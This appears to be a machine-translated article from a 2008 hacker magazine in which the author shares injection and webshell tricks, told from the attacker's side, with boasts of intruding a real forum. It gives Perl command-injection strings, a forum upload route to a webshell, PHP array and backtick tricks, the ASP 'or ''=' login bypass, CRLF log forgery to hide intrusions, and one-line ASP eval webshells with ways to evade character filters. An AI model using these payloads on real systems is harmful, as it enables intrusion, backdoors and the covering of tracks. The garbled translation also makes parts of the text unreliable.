Details I noticed during the intrusion Process (2)

Hacker manual 200802
Details I noticed during the intrusion Process (2)
LCX

In the last phase, I wrote about the details that need to be noticed during the process of intruding into the Intranet. However, injection is popular now. Currently, regular injection targets dynamic scripts such as ASP, PHP, JSP, CFM, and CGI. For various scripts, if you pay attention to some details, such as constructing special characters, it will also play a wonderful role. For example, the earliest % 5c brute-force database and % 00 truncation were all sensational vulnerabilities. The discovery of these vulnerabilities is nothing more than the discovery of some details of the script language. In this issue, I will discuss some details that I will notice during the injection process, mainly about some special symbols.

Let's talk about Perl first. I am not familiar with this language. After all, it is rarely used for server scripting on the market. The most common method for Perl intrusion is probably two. One is to try to write webshells to cgi files, and the other is to use the original Perl program to execute commands. The first method generally writes the "; system @ argv; #" symbol. If it is written in 1. pl, You can execute 1.pl? Dir = c. If the original web page url is http://www.xxx.com/1.pl? Id = ABC, we will try to execute http://www.xxx.com/1.pl? Id = ABC | uname to check whether the uname command can be executed. Actually | it is a delimiter in Linux commands, not Perl. However, there is also a separator in Perl, which is rarely noticed. In the past, there was a very famous forum named Lei ao. It seems that there is also a vulnerability in the latest version that can upload webshells, if the background does not limit special symbols to register user accounts. A long time ago, I intruded into a forum named Lei ao. At that time, the attack was still in progress, as shown in figure 1.

 

Figure 1

We registered a q lcx account, and then sent the content "and rename (qq (physical path of the attachment you uploaded), QQ (renamed as the physical path of the webshell you want )) ", the example is as follows. Then you can browse the post to get a webshell. Here is the separator, Q here is the meaning of single quotes, QQ is of course double quotes, so q lcx ...... The messy content is even meaningful in Perl, which does not affect the execution of the rename function.

Let's talk about PhP. PHP is the most commonly used method. If a URL is http://www.sohu.com/x.php? Id = 1, then we change to http://www.sohu.com/x.php? Id [] = 1. If the error is not blocked, the success rate should be as high as 60%, which is similar to the early % 5c. This is because the value behind the ID is generally a value. If we change it to [], the program will mistakenly think it is followed by an array, so the program will spend an error, this is similar to changing id = 1 to id = A or ID = 1', but some programs tend to be less rigorous, for example, if we only judge whether it is a character or an array with single quotation marks, we can succeed. Another chicken-style symbol in PHP is ', which is also an operator, as we write <? $ Result = '$ LS-a'; echo $ result;?>, It will also be executed. However, as long as the server security mode is enabled or the server permissions are strictly set, we will not be able to succeed. However, if we are able to intrude successfully, isn't it just the laziness of network administrators?

Finally, let's talk about ASP, which is familiar to everyone. ASP is the universal password of % 5c storm library and 'or ''=. In fact, I have used % 0d % 0a before. This is actually not something in ASP, but it can be regarded as an HTTP server, most HTTP servers resolve a request containing % 0d % 0a as a carriage return and wrap it in the log. ASP + MSSQL can be used as separators to execute multiple SQL statements. For specific applications, there is an article on the internet, <news cms4.0sp5 commercial version of the fatal injury>, you can take a look At Baidu. As for the application on the HTTP server, you can generate line breaks in the logs by sending % 0d % 0a or % u0d0a, so that the log can be forged.
Intrusion behaviors are drowned in a large number of false logs. It is difficult to find the real intruders and cause intrusion analysis. ASP has another one, namely the "%". Many people have encountered the situation of filtering the "%" number when uploading or writing a webshell, so they have adopted the CS Trojan of the ice Fox prodigal son, because there is no percent sign in it. In fact, there is another way to write ASP: ● <script language = vbs runat = Server> ...... Code ...... </SCRIPT> ● in this way, we can add our common code eval (Request ("#") to it, so we don't need a percent sign.

I am familiar with ASP and want to talk about it more. How can I modify <script language = vbs runat = Server> eval (Request ("#") </SCRIPT>? We can write ● <script language = vbs runat = Server> eval (Request (CHR (35) </SCRIPT> ● remove single quotation marks without them. If it is not encrypted, how can we change it? I want to change it to <script language = vbs runat = Server> eval (Request (CHR (35 ))))))) </SCRIPT> ● I added four matching parentheses to run the script. Can I add more? Of course ...... Can the square brackets be used in a PHP Trojan? Dear reader, the rest of the work is for you.